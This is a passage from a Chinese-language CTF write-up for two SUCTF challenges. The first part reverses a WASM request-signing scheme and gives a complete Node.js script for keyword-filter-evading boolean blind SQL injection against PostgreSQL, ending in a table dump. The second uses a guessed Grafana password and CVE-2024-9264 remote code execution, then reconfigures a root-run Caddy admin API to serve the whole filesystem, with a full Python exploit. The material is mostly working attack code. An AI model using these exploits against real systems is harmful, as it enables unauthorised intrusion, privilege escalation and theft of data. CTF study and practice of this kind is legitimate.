const { instance: inst2 } = await WebAssembly.instantiate(buf2, go2.importObject);
go2.run(inst2);

for (let i = 0; i < 100; i++) {
if (typeof globalThis.__suPrep === "function" && typeof globalThis.__suFinish === "function") return true;
await new Promise((r) => setTimeout(r, 10));
}
throw new Error("wasm init");
})();
return wasmReady;
}

async function getSignMaterial() {
const res = await fetch(_d(0), { method: "GET" });
const data = await res.json();
if (!data.ok) throw new Error(data.error || "sign");
return data.data;
}

async function doQuery() {
err.textContent = "";
out.textContent = "";
const q = $("q").value || "";
if (!q) {
err.textContent = "empty";
return;
}
try {
await loadWasm();
const material = await getSignMaterial();
const ua = navigator.userAgent || "";
const uaData = navigator.userAgentData;
const brands = uaData && uaData.brands ? uaData.brands.map((b) => b.brand + ":" + b.version).join(",") : "";
const tz = (() => {
try {
return Intl.DateTimeFormat().resolvedOptions().timeZone || "";
} catch {
return "";
}
})();
const intl = (() => {
try {
return Intl.DateTimeFormat().resolvedOptions().locale ? "1" : "0";
} catch {
return "0";
}
})();
const wd = navigator.webdriver ? "1" : "0";
const probe = "wd=" + wd + ";tz=" + tz + ";b=" + brands + ";intl=" + intl;

const pre = globalThis.__suPrep(
_d(2),
_d(1),
q,
material.nonce,
String(material.ts),
material.seed,
material.salt,
ua,
probe
);
if (!pre) throw new Error("prep");
const secret2 = unscramble(pre, material.nonce, material.ts);
const mixed = mixSecret(secret2, probe, material.ts);
const sig = globalThis.__suFinish(
_d(2),
_d(1),
q,
material.nonce,
String(material.ts),
bytesToB64Url(mixed),
probe
);

const res = await fetch(_d(1), {
method: _d(2),
headers: { [_d(3)]: _d(4) },
body: JSON.stringify({ q, nonce: material.nonce, ts: material.ts, sign: sig })
});
const data = await res.json();
if (!data.ok) {
err.textContent = data.error || "error";
return;
}
out.textContent = JSON.stringify(data.data, null, 2);
} catch (e) {
err.textContent = String(e.message || e);
}
}

window.addEventListener("DOMContentLoaded", () => {
$("run").addEventListener("click", doQuery);
$("q").addEventListener("keydown", (e) => {
if (e.key === "Enter") doQuery();
});
});
})();

前端不会直接把 q 发送到 /api/query,而是先调用 /api/sign 获取 nonce/ts/seed/salt,然后调用 wasm 暴露的两个函数:

  • __suPrep(...)
  • __suFinish(...)

中间还会进行两段 JS 混淆处理:

  1. unscramble(pre, nonce, ts)
  2. mixSecret(secret2, probe, ts)

最终得到 sign,请求体为:

{
"q": "...",
"nonce": "...",
"ts": 123456789,
"sign": "..."
}

所以,第一步不是直接注入,而是先完整复现签名链,让服务端接受我们构造的 SQL payload

用复现签名后的请求测试单引号:

  • 输入: '
  • 返回: ERROR: unterminated quoted string ... (SQLSTATE 42601)

可确定: 存在 SQL 注入;数据库是 PostgreSQL;输入在字符串上下文中
同时观察到有关键字拦截(返回 blocked),常见的 UNION / OR / AND / -- / /* / ; 会被过滤

虽然被过滤了常规拼接方式,但仍可利用字符串拼接表达式:

%'||(SELECT ... )||'

其核心是把原有 LIKE '%{q}%'中的字符串闭合后,拼接一个子查询表达式,再补回字符串

为了避免 OR/AND 关键字,我们使用:

CASE WHEN (条件) THEN '%' ELSE 'NO_MATCH' END

这样查询是否返回记录数量(有数据 / 无数据)就能作为布尔信号,形成盲注通道

布尔探测 payload 模板:

%'||(SELECT CASE WHEN (<cond>) THEN '%' ELSE 'NO_MATCH_9QX' END)||'

判断规则:

  • 返回 data 非空 -> 条件为真
  • 返回 data 为空 -> 条件为假

随后通过二分法逐字符读取:

  1. 先判断长度是否覆盖当前位置
  2. ascii(substring(...)) >= mid 做二分
  3. 还原字符串

枚举目标为:

  • pg_class + pg_namespace 枚举 public 下普通表
  • 对每个表用 row_to_json 读取首行内容

最终表有:

  • posts
  • secrets

secrets 首行拿到:
{"id":1,"flag":"SUCTF{P9s9L_!Nject!On_IS_3@$Y_RiGht}"}

const fs = require("fs");
const path = require("path");

const target = process.argv[2] || "http://101.245.108.250:10001";

const UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36";

function b64UrlToBytes(s) {
let t = s.replace(/-/g, "+").replace(/_/g, "/");
while (t.length % 4) t += "=";
return new Uint8Array(Buffer.from(t, "base64"));
}

function bytesToB64Url(bytes) {
return Buffer.from(bytes)
.toString("base64")
.replace(/\+/g, "-")
.replace(/\//g, "_")
.replace(/=+$/, "");
}

function rotl32(x, r) {
return ((x << r) | (x >>> (32 - r))) >>> 0;
}

function rotr32(x, r) {
return ((x >>> r) | (x << (32 - r))) >>> 0;
}

const rotScr = [1, 5, 9, 13, 17, 3, 11, 19];

function maskBytes(nonceB64, ts) {
const nb = b64UrlToBytes(nonceB64);
let s = 0 >>> 0;
for (let i = 0; i < nb.length; i++) {
s = (Math.imul(s, 131) + nb[i]) >>> 0;
}
const hi = Math.floor(ts / 0x100000000);
s = (s ^ (ts >>> 0) ^ (hi >>> 0)) >>> 0;
const out = new Uint8Array(32);
for (let i = 0; i < 32; i++) {
s ^= (s << 13) >>> 0;
s ^= s >>> 17;
s ^= (s << 5) >>> 0;
out[i] = s & 0xff;
}
return out;
}

function unscramble(pre, nonceB64, ts) {
const buf = b64UrlToBytes(pre);
if (buf.length !== 32) throw new Error("prep");
for (let i = 0; i < 8; i++) {
const o = i * 4;
let w =
(buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
w = rotr32(w, rotScr[i]);
buf[o] = w & 0xff;
buf[o + 1] = (w >>> 8) & 0xff;
buf[o + 2] = (w >>> 16) & 0xff;
buf[o + 3] = (w >>> 24) & 0xff;
}
const mask = maskBytes(nonceB64, ts);
for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
return buf;
}

function probeMask(probe, ts) {
let s = 0 >>> 0;
for (let i = 0; i < probe.length; i++) {
s = (Math.imul(s, 33) + probe.charCodeAt(i)) >>> 0;
}
const hi = Math.floor(ts / 0x100000000);
s = (s ^ (ts >>> 0) ^ (hi >>> 0)) >>> 0;
const out = new Uint8Array(32);
for (let i = 0; i < 32; i++) {
s = (Math.imul(s, 1103515245) + 12345) >>> 0;
out[i] = (s >>> 16) & 0xff;
}
return out;
}

function mixSecret(buf, probe, ts) {
const mask = probeMask(probe, ts);
if (mask[0] & 1) {
for (let i = 0; i < 32; i += 2) {
const t = buf[i];
buf[i] = buf[i + 1];
buf[i + 1] = t;
}
}
if (mask[1] & 2) {
for (let i = 0; i < 8; i++) {
const o = i * 4;
let w =
(buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
w = rotl32(w, 3);
buf[o] = w & 0xff;
buf[o + 1] = (w >>> 8) & 0xff;
buf[o + 2] = (w >>> 16) & 0xff;
buf[o + 3] = (w >>> 24) & 0xff;
}
}
for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
return buf;
}

async function loadWasm() {
require("./wasm_exec.js");

const go1 = new globalThis.Go();
const mod1 = await WebAssembly.instantiate(fs.readFileSync(path.join(__dirname, "crypto1.wasm")), go1.importObject);
go1.run(mod1.instance);

const go2 = new globalThis.Go();
const mod2 = await WebAssembly.instantiate(fs.readFileSync(path.join(__dirname, "crypto2.wasm")), go2.importObject);
go2.run(mod2.instance);

for (let i = 0; i < 200; i++) {
if (typeof globalThis.__suPrep === "function" && typeof globalThis.__suFinish === "function") {
return;
}
await new Promise((r) => setTimeout(r, 10));
}
throw new Error("wasm init failed");
}

async function signedQuery(q) {
const signRes = await fetch(`${target}/api/sign`, {
headers: { "user-agent": UA }
});
const signData = await signRes.json();
if (!signData.ok) throw new Error(`sign failed: ${JSON.stringify(signData)}`);
const material = signData.data;

const probe = "wd=0;tz=Asia/Shanghai;b=Chromium:137,Not=A?Brand:24,Google Chrome:137;intl=1";

const pre = globalThis.__suPrep(
"POST",
"/api/query",
q,
material.nonce,
String(material.ts),
material.seed,
material.salt,
UA,
probe
);
if (!pre) throw new Error("prep failed");

const secret2 = unscramble(pre, material.nonce, material.ts);
const mixed = mixSecret(secret2, probe, material.ts);
const sig = globalThis.__suFinish(
"POST",
"/api/query",
q,
material.nonce,
String(material.ts),
bytesToB64Url(mixed),
probe
);

const res = await fetch(`${target}/api/query`, {
method: "POST",
headers: {
"content-type": "application/json",
"user-agent": UA
},
body: JSON.stringify({ q, nonce: material.nonce, ts: material.ts, sign: sig })
});
return res.json();
}

function makePayload(condSql) {
return `%'||(SELECT CASE WHEN (${condSql}) THEN '%' ELSE 'NO_MATCH_9QX' END)||'`;
}

async function askBool(condSql) {
const q = makePayload(condSql);
const r = await signedQuery(q);
if (!r.ok) {
throw new Error(`query failed: ${JSON.stringify(r)}`);
}
return Array.isArray(r.data) && r.data.length > 0;
}

async function findAscii(exprSql, pos) {
const hasPos = await askBool(`(SELECT length(${exprSql}))>=${pos}`);
if (!hasPos) return 0;

let lo = 32;
let hi = 126;
while (lo < hi) {
const mid = Math.floor((lo + hi + 1) / 2);
const cond = `(SELECT ascii(substring(${exprSql} from ${pos} for 1)))>=${mid}`;
const ok = await askBool(cond);
if (ok) {
lo = mid;
} else {
hi = mid - 1;
}
await new Promise((r) => setTimeout(r, 80));
}
return lo;
}

async function readString(exprSql, maxLen = 80) {
let out = "";
for (let i = 1; i <= maxLen; i++) {
const c = await findAscii(exprSql, i);
if (!c) break;
out += String.fromCharCode(c);
process.stdout.write(`\r${out}`);
}
process.stdout.write("\n");
return out;
}

async function tableAt(idx) {
const expr = `(SELECT c.relname FROM pg_class c JOIN pg_namespace n ON c.relnamespace=n.oid WHERE concat(c.relkind,n.nspname)='rpublic' OFFSET ${idx} LIMIT 1)`;
const exists = await askBool(`(SELECT length(${expr}))>0`);
if (!exists) return null;
return readString(expr, 40);
}

async function dumpRowJson(table, rowIdx) {
const expr = `(SELECT concat((SELECT row_to_json(t) FROM ${table} t OFFSET ${rowIdx} LIMIT 1)))`;
const exists = await askBool(`(SELECT length(${expr}))>0`);
if (!exists) return null;
return readString(expr, 180);
}

(async () => {
console.log(`[+] target: ${target}`);
await loadWasm();

const tables = [];
for (let i = 0; i < 8; i++) {
process.stdout.write(`[+] enum table ${i} ... `);
const t = await tableAt(i);
if (!t) {
console.log("none");
break;
}
tables.push(t);
console.log(`=> ${t}`);
}

for (const t of tables) {
console.log(`\n[+] dump first rows from ${t}`);
for (let r = 0; r < 3; r++) {
process.stdout.write(` row ${r}: `);
const j = await dumpRowJson(t, r);
if (!j) {
console.log("<none>");
break;
}
console.log(`=> ${j}`);
if (/flag\{|suctf\{|ctf\{/i.test(j)) {
console.log(`\nflag: ${j}`);
return;
}
}
}
})().catch((e) => {
console.error(e);
process.exit(1);
});

SU_Thief

The lazy admin neglected that the closest thief around him could help him steal /root/flag

可以发现是 Grafana 11.0.0,尝试默认账密没有进去,然后爆了一手是admin/1q2w3e,结合版本可以搜到 CVE-2024-9264

虽然 CVE-2024-9264 能 RCE,但执行身份是 grafana,权限不足以读取 /root/flag

所以这题的重点不是“直接打 RCE 读 root”,而是题目提示里的closest thief around him could help him steal

枚举进程后发现:

  • caddyroot 身份运行
  • 本地可访问 Caddy admin API:127.0.0.1:2019

也就是:

  1. 我们先用 Grafana RCE(grafana 权限)
  2. 再从内网访问 Caddy admin API(root 服务)
  3. 热加载一个恶意 Caddy 配置,让它把 / 当静态目录暴露到一个新路由
  4. 最后从外部 HTTP 直接读 /root/flag
import argparse
import base64
import json
import re
import sys
from typing import Any, Dict

import requests


class ExploitError(Exception):
pass


class SUThiefExploit:
def __init__(self, base_url: str, username: str, password: str, timeout: int = 15):
self.base_url = base_url.rstrip("/")
self.auth = (username, password)
self.timeout = timeout
self.session = requests.Session()

def _ds_query(self, expression: str) -> Dict[str, Any]:
url = (
f"{self.base_url}/api/ds/query"
"?ds_type=__expr__&expression=true&requestId=Q101"
)
payload = {
"queries": [
{
"refId": "B",
"datasource": {
"type": "__expr__",
"uid": "__expr__",
"name": "Expression",
},
"type": "sql",
"hide": False,
"expression": expression,
"window": "",
}
],
"from": "1729313027261",
"to": "1729334627261",
}

resp = self.session.post(
url,
auth=self.auth,
json=payload,
timeout=self.timeout,
)
if resp.status_code != 200:
raise ExploitError(
f"/api/ds/query HTTP {resp.status_code}: {resp.text[:300]}")

try:
data = resp.json()
except Exception as exc:
raise ExploitError(
f"/api/ds/query returned non-JSON: {resp.text[:300]}") from exc

return data

@staticmethod
def _extract_content(data: Dict[str, Any]) -> str:
try:
values = data["results"]["B"]["frames"][0]["data"]["values"]
content = values[0][0]
if not isinstance(content, str):
return str(content)
try:
return content.encode("utf-8").decode("unicode_escape").encode("latin1", errors="ignore").decode("utf-8", errors="ignore")
except Exception:
return content
except Exception:
err = data.get("results", {}).get("B", {}).get("error")
if err:
raise ExploitError(f"query failed: {err}")
raise ExploitError(
f"unexpected ds/query response: {json.dumps(data)[:600]}")

def read_file(self, path: str) -> str:
safe_path = path.replace("'", "''")
expr = f"SELECT content FROM read_blob('{safe_path}')"
data = self._ds_query(expr)
return self._extract_content(data)

def run_shell(self, command: str) -> str:
# SQL string uses single quotes, so escape any single quote in shell command.
cmd = command.replace("'", "''")
expr = (
"SELECT 1;"
"install shellfs from community;"
"LOAD shellfs;"
f"SELECT * FROM read_csv('{cmd} >/tmp/grafana_cmd_output 2>&1 |')"
)

_ = self._ds_query(expr)
return self.read_file("/tmp/grafana_cmd_output")

def get_health(self) -> Dict[str, Any]:
url = f"{self.base_url}/api/health"
resp = self.session.get(url, timeout=self.timeout)
if resp.status_code != 200:
raise ExploitError(f"/api/health HTTP {resp.status_code}")
return resp.json()

def load_caddy_steal_route(self) -> str:
cfg_obj = {
"admin": {"listen": "127.0.0.1:2019"},
"apps": {
"http": {
"servers": {
"srv0": {
"listen": [":80"],
"routes": [
{
"match": [{"path": ["/steal/*"]}],
"handle": [
{
"handler": "subroute",
"routes": [
{
"handle": [
{
"handler": "rewrite",
"strip_path_prefix": "/steal",
}
]
},
{
"handle": [
{"handler": "vars",
"root": "/"},
{
"handler": "file_server",
"hide": ["/tmp/Caddyfile"],
},
]
},
],
}
],
},
{
"handle": [
{
"handler": "reverse_proxy",
"upstreams": [{"dial": "127.0.0.1:3000"}],
}
]
},
],
}
}
}
},
}

cfg_json = json.dumps(cfg_obj, separators=(",", ":"))
cfg_b64 = base64.b64encode(cfg_json.encode()).decode()

cmd = (
f"echo {cfg_b64} | base64 -d >/tmp/caddy_steal.json; "
'curl -s -X POST -H "Content-Type: application/json" '
"--data-binary @/tmp/caddy_steal.json http://127.0.0.1:2019/load"
)
return self.run_shell(cmd)

def verify_steal_route(self) -> bool:
out = self.run_shell("curl -s http://127.0.0.1:2019/config/")
return "/steal/*" in out

def fetch_flag_via_steal(self) -> str:
url = f"{self.base_url}/steal/root/flag"
resp = self.session.get(url, timeout=self.timeout)
if resp.status_code != 200:
raise ExploitError(
f"GET /steal/root/flag HTTP {resp.status_code}: {resp.text[:300]}")
return resp.text.strip()


def main() -> int:
parser = argparse.ArgumentParser(description="SU_Thief one-click exploit")
parser.add_argument(
"--url", default="http://156.239.26.40:13333", help="Target base URL")
parser.add_argument("--user", default="admin", help="Grafana username")
parser.add_argument("--password", default="1q2w3e",
help="Grafana password")
parser.add_argument("--timeout", type=int, default=15, help="HTTP timeout")
args = parser.parse_args()

exp = SUThiefExploit(args.url, args.user, args.password, args.timeout)

try:
print("[+] Checking target health...")
health = exp.get_health()
print(f"[+] Grafana version: {health.get('version')}")

print("[+] Verifying RCE context with id...")
id_out = exp.run_shell("id")
print(id_out.strip())

print("[+] Loading malicious Caddy route via local admin API...")
route_ok = False
for i in range(1, 4):
load_out = exp.load_caddy_steal_route().strip()
if load_out:
print(f"[i] /load attempt {i} output: {load_out}")
else:
print(f"[+] /load attempt {i} output empty (usually success).")

route_ok = exp.verify_steal_route()
if route_ok:
print("[+] Verified /steal route is active in Caddy config.")
break
print("[!] /steal route not active yet, retrying...")

if not route_ok:
raise ExploitError("failed to activate /steal route after retries")

print("[+] Fetching /root/flag through /steal route...")
flag = exp.fetch_flag_via_steal()
print(f"\n[FLAG] {flag}")

if "<title>Grafana</title>" in flag:
raise ExploitError(
"received Grafana HTML instead of flag; /steal route may not be taking effect")

m = re.search(r"SUCTF\{[^\n\r}]+\}", flag)
if m:
print(f"[+] Parsed flag: {m.group(0)}")
return 0

except ExploitError as exc:
print(f"[-] Exploit failed: {exc}")
return 1
except requests.RequestException as exc:
print(f"[-] Network error: {exc}")
return 1


if __name__ == "__main__":
sys.exit(main())
# SUCTF{c4ddy_4dm1n_4p1_2019_pr1v35c}